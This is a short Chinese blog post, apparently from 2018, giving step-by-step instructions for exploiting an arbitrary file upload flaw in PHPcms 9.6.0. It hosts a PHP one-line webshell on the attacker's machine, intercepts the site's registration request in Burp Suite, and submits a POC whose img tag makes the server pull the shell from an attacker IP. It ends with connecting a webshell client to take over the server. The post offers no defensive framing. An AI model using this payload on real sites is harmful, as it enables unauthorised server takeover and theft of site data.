美文网首页
PHPcms9.6.0 最新版任意文件上传漏洞

PHPcms9.6.0 最新版任意文件上传漏洞

作者: 二潘 | 来源:发表于2018-01-18 21:14 被阅读45次

1、首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行),在根目录下新建一个txt文本文件里面写上php一句话,如上图可以访问

图片.png

2、接着我们找到phpcms网站注册模块,随便填一下信息

图片.png

3、然后我们用burpsuite抓包

图片.png

然后发送到repeater

图片.png

我们在最下面的注册那儿使用img标签插入我们本地第一步搭建的一句话

提交的poc

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://192.168.1.105/1.txt?.php#.jpg>&dosubmit=1&protocol=

只需要修改img里面的链接为你本地写入的一句话即可

我们可以看到repeater里MYSQL query成功插入,接着访问上图repeater里我标黄语句,执行一句话连接菜刀,getshell

图片.png 图片.png

相关文章

网友评论

      本文标题:PHPcms9.6.0 最新版任意文件上传漏洞

      本文链接:https://www.haomeiwen.com/subject/nmhgoxtx.html